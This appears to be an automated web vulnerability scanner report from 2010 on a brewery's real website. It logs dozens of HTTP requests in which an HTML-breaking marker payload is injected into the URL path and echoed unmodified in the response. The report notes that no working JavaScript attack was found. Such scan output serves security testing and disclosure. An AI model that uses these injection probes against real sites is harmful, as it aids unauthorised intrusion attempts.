This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /contentf196b"><a>845524f273a/css/content/js/combined.js HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:51:36 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45663"><a>8b95a448cfa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /content45663"><a>8b95a448cfa/img/ HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:44:40 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1441f"><a>7fd0b4d00b1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /content1441f"><a>7fd0b4d00b1/img/content/css/basic.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:51:35 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 718f2"><a>c3b71b0f726 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /content718f2"><a>c3b71b0f726/img/content/css/ninkasi.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:51:38 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be5a8"><a>50fc2122c0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /contentbe5a8"><a>50fc2122c0/img/content/css/print.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:51:38 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13212
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d58e6"><a>673bbcd9798 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /contentd58e6"><a>673bbcd9798/img/content/js/basic.js HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:51:39 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a62b0"><a>552d9ff3d4d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /contenta62b0"><a>552d9ff3d4d/img/content/js/combined.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:51:38 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 874f9"><a>3827eb81fc7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /content874f9"><a>3827eb81fc7/img/content/js/combined.js HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:51:40 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b7fb"><a>d9b89a79e3e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /content1b7fb"><a>d9b89a79e3e/img/skin/ HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:44:45 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 751d3"><a>fcf7cbffa31 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /content751d3"><a>fcf7cbffa31/img/skin/content/css/basic.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:51:41 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8616a"><a>5ae4af16787 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /content8616a"><a>5ae4af16787/img/skin/content/css/ninkasi.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:51:43 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46b3e"><a>f6c375e180b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /content46b3e"><a>f6c375e180b/img/skin/content/css/print.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:51:41 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e515"><a>56087270b4d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /content5e515"><a>56087270b4d/img/skin/content/js/basic.js HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:51:44 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7dc2"><a>a7f908ef1e0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /contenta7dc2"><a>a7f908ef1e0/img/skin/content/js/combined.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:51:53 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c044c"><a>596b9b87e27 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /contentc044c"><a>596b9b87e27/img/skin/content/js/combined.js HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:51:55 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a84dd"><a>998f8f781b2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /contenta84dd"><a>998f8f781b2/img/skin/ninkasi-random/ HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:44:46 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1aa20"><a>7c1fe0d07f2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /content1aa20"><a>7c1fe0d07f2/img/skin/ninkasi-random/content/css/basic.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:51:58 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9aacc"><a>2d12b65e1f4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /content9aacc"><a>2d12b65e1f4/img/skin/ninkasi-random/content/css/ninkasi.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 500 Internal Server Error Date: Sun, 21 Nov 2010 21:51:58 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff256"><a>504bb81dd8e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /contentff256"><a>504bb81dd8e/img/skin/ninkasi-random/content/css/print.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:51:59 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload accc7"><a>cc0bd9440f7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /contentaccc7"><a>cc0bd9440f7/img/skin/ninkasi-random/content/js/basic.js HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:52:01 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 590ea"><a>0538fc89295 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /content590ea"><a>0538fc89295/img/skin/ninkasi-random/content/js/combined.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:52:02 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44eb8"><a>507cafa61ff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /content44eb8"><a>507cafa61ff/img/skin/ninkasi-random/content/js/combined.js HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:52:01 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a306"><a>684cd006b5e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /content6a306"><a>684cd006b5e/js/ HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:44:46 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c9a9"><a>41638d41753 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
